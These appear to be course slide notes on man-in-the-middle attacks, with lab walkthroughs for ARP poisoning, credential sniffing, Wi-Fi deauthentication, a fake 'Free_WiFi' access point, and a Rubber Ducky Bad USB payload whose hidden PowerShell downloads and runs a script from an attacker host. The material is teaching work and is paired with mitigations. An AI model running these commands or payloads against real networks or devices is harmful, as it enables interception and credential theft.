Unit 2 Man-In-Middle Attack, Bad USB with MIMA
- 1. Spying: Introduction, Man-In-Middle Attack, Bad USB with MIMA, ARP poisoning with MIMA, and Fake Access Point Theory with MIMA. Spying: Introduction, Man-In-The-Middle Attack, and Related Techniques Introduction to Spying in Cybersecurity Spying in cybersecurity refers to the act of intercepting, monitoring, or stealing information from a target system, network, or user without their consent. It is commonly associated with cyber espionage, surveillance, and malicious attacks. Spying techniques are widely used by attackers to exploit vulnerabilities in networks, applications, and hardware devices. Objectives of Spying: 1. Data Theft: Stealing sensitive information such as passwords, financial details, and private communications. 2. Surveillance: Monitoring user activities, keystrokes, or network traffic. 3. Exploiting Network Weaknesses: Finding and exploiting weaknesses in network security. 4. Manipulation and Disruption: Altering communication data or injecting malicious payloads. Man-In-The-Middle Attack (MIMA) A Man-In-The-Middle Attack (MIMA) is a cyberattack where an attacker secretly intercepts and potentially alters the communication between two parties without their knowledge.
- 2. Steps in MIMA: 1. Interception: The attacker gains access to the communication channel. 2. Decryption (if applicable): If encryption is used, the attacker attempts to decrypt the messages. 3. Modification: The attacker alters the data before passing it on. 4. Relay: The manipulated data is sent to the intended recipient, making it appear as a legitimate exchange. Types of Man-In-The-Middle Attacks 1. Session Hijacking – Stealing session tokens to impersonate a user.
- 3. 2. SSL Stripping – Downgrading HTTPS to HTTP for easy interception. 3. Wi-Fi Eavesdropping – Intercepting communications on unsecured Wi-Fi networks. 4. DNS Spoofing – Redirecting users to malicious websites by altering DNS responses. 5. ARP Poisoning – Manipulating ARP tables to reroute network traffic. Lab Exercise: Man-In-The-Middle Attack Using ARP Spoofing Objective: To demonstrate how an attacker can intercept network traffic between two devices using ARP poisoning. Tools Required: ● Kali Linux ● ettercap (or arpspoof) ● Wireshark (for packet analysis) ● Two devices (one victim, one attacker) Lab Setup: 1. Connect all devices to the same network. 2. Ensure Kali Linux has the necessary tools installed: sudo apt update && sudo apt install ettercap-text-only wireshark 3. Enable IP forwarding to allow packet forwarding: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward Step 1: Start ARP Spoofing Attack Using ettercap, initiate the attack: sudo ettercap -Tq -M arp:remote /192.168.1.10// /192.168.1.1// ● Replace 192.168.1.10 with the victim’s IP. ● Replace 192.168.1.1 with the gateway’s IP. Alternatively, using arpspoof: sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
- 4. Step 2: Capture Network Traffic ● Open Wireshark and start capturing packets on eth0. ● Apply filters like http, ftp, or telnet to look for unencrypted data. Step 3: Analyze the Data ● Identify credentials or sensitive data intercepted. ● Observe HTTP requests and responses. Step 4: Stop the Attack and Clean Up ● Stop ARP spoofing: sudo pkill ettercap ● sudo pkill arpspoof ● Disable IP forwarding: echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward Mitigation Strategies ● Use HTTPS and SSL/TLS for secure communication. ● Enable ARP spoofing detection tools like arpwatch. ● Implement static ARP entries where feasible. ● Use VPNs to encrypt traffic. ● Employ multi-factor authentication (MFA). Bad USB with MIMA Bad USB refers to a maliciously modified USB device that exploits the trust computers place in USB peripherals. When combined with MIMA techniques, it can be a powerful spying tool. How Bad USB Works in MIMA: 1. Device Impersonation: The USB disguises itself as a keyboard, network adapter, or storage device. 2. Payload Execution: Upon connection, the USB executes a script to intercept or manipulate network traffic. 3. Man-In-The-Middle Attack: The attacker captures and modifies communication between the victim and a legitimate service.
- 5. 4. Data Exfiltration: Sensitive data such as credentials or keystrokes are stolen and sent to an external server. Lab Exercise: Bad USB Attack Using Rubber Ducky Objective: To demonstrate how a Bad USB device can be used to launch a Man-In-The-Middle Attack. Tools Required: ● Hak5 Rubber Ducky (or Digispark USB) ● Kali Linux ● Pre-configured payload script Step 1: Prepare the Malicious USB ● Create a Rubber Ducky script (payload.txt): DELAY 1000 ● GUI r
- 6. ● DELAY 500 ● STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/mima.ps1')" 1. ENTER 2. Encode the script into inject.bin using DuckEncoder: java -jar duckencoder.jar -i payload.txt -o inject.bin 3. Load inject.bin onto the Rubber Ducky USB. Step 2: Deploy the Attack 1. Plug the Bad USB into the victim’s system. 2. The script executes a PowerShell command that downloads and runs a remote MIMA script. 3. The attacker intercepts network traffic and can manipulate data in transit. Step 3: Analyze and Clean Up ● Use Wireshark to capture traffic and confirm the attack. ● Remove malicious scripts and reset the victim’s network settings. Prevention Measures: ● Disable USB autorun and limit USB device usage. ● Use endpoint security solutions. ● Implement network segmentation to prevent unauthorized access. ● Monitor for suspicious USB activity. Mitigation Strategies ● Use HTTPS and SSL/TLS for secure communication. ● Enable ARP spoofing detection tools like arpwatch. ● Implement static ARP entries where feasible. ● Use VPNs to encrypt traffic. ● Employ multi-factor authentication (MFA). ● Restrict USB device access and enforce security policies. ARP Poisoning with MIMA
- 7. Address Resolution Protocol (ARP) Poisoning is a network attack that exploits the ARP protocol to associate the attacker's MAC address with the IP address of another device, redirecting traffic through the attacker. ARP Poisoning Attack Steps: 1. Spoofing ARP Messages: The attacker sends fake ARP messages to the network. 2. Misleading Devices: Victim devices associate the attacker's MAC address with the legitimate device’s IP. 3. Interception & Modification: The attacker intercepts and modifies data passing through the network. 4. Denial of Service (Optional): The attacker can drop or alter packets to disrupt network communication. Lab Setup: 1. Connect all devices to the same network. 2. Ensure Kali Linux has the necessary tools installed: sudo apt update && sudo apt install ettercap-text-only wireshark
- 8. 3. Enable IP forwarding to allow packet forwarding: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward Step 1: Start ARP Poisoning Attack Using ettercap, initiate the attack: sudo ettercap -Tq -M arp:remote /192.168.1.10// /192.168.1.1// ● Replace 192.168.1.10 with the victim’s IP. ● Replace 192.168.1.1 with the gateway’s IP. Alternatively, using arpspoof: sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 ● This command tells the victim’s machine that the attacker is the gateway. ● To poison the gateway as well, run: sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.10 Step 2: Capture Network Traffic ● Open Wireshark and start capturing packets on eth0. ● Apply filters like http, ftp, or telnet to look for unencrypted data. Step 3: Inject Malicious Data ● Use dsniff to capture credentials: sudo dsniff -i eth0 Modify data using Bettercap: sudo bettercap -iface eth0 net.probe on set arp.spoof.targets 192.168.1.10 ● arp.spoof on Step 4: Stop the Attack and Clean Up Stop ARP spoofing: sudo pkill ettercap ● sudo pkill arpspoof
- 9. ● Disable IP forwarding: Detection & Prevention: ● Use static ARP tables where possible. ● Enable ARP inspection on network switches. ● Use security tools like ARPwatch and Wireshark. ● Implement network segmentation. Fake Access Point Theory with MIMA Introduction to Fake Access Points A Fake Access Point (Fake AP) is a rogue Wi-Fi network set up by an attacker to trick users into connecting, allowing them to intercept and manipulate network traffic. This is commonly used in Man-In-The-Middle Attacks (MIMA) to steal credentials, inject malware, or spy on users' activities. How Fake Access Points Work in MIMA: 1. Impersonating Legitimate Networks: The attacker sets up a Wi-Fi network with the same name (SSID) as a trusted network. 2. Forcing Users to Connect: Using Deauthentication Attacks, attackers disconnect users from the real Wi-Fi, forcing them to reconnect to the fake one. 3. Traffic Interception: All user data passes through the attacker's system, allowing credential theft, packet injection, and phishing attacks. 4. Credential Harvesting: Attackers can redirect users to fake login pages to steal passwords.
- 10. Lab Exercise: Creating a Fake Access Point with MIMA Objective: To demonstrate how an attacker can set up a fake Wi-Fi network and perform a Man-In-The-Middle Attack. Tools Required: ● Kali Linux ● aircrack-ng (for deauthentication attack) ● hostapd (for creating the fake AP) ● dnsmasq (for DHCP and DNS spoofing) ● Wireshark (for packet analysis) Step 1: Set Up the Fake Access Point 1. Install the required tools: sudo apt install hostapd dnsmasq aircrack-ng
- 11. Configure hostapd to create a fake Wi-Fi network: sudo nano /etc/hostapd/hostapd.conf Add the following: interface=wlan0 ssid=Free_WiFi hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 2. ignore_broadcast_ssid=0 3. Start the fake access point: sudo hostapd /etc/hostapd/hostapd.conf Step 2: Force Users to Connect Use aircrack-ng to disconnect users from real Wi-Fi networks: sudo aireplay-ng -0 10 -a <BSSID> wlan0 ● Replace <BSSID> with the real access point’s MAC address. Step 3: Perform the Man-In-The-Middle Attack 1. Enable IP forwarding: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward Use bettercap to intercept and modify traffic: sudo bettercap -iface wlan0 net.probe on set wifi.ssid Free_WiFi 2. wifi.ap on 3. Capture credentials using dsniff: sudo dsniff -i wlan0 Step 4: Clean Up Stop hostapd and dnsmasq: sudo pkill hostapd
- 12. ● sudo pkill dnsmasq ● Disable IP forwarding: echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward Prevention Measures: ● Avoid connecting to open Wi-Fi networks. ● Use VPNs to encrypt traffic. ● Enable HTTPS and SSL/TLS for secure communication. ● Use Wi-Fi security tools like WPA3 and Enterprise Authentication.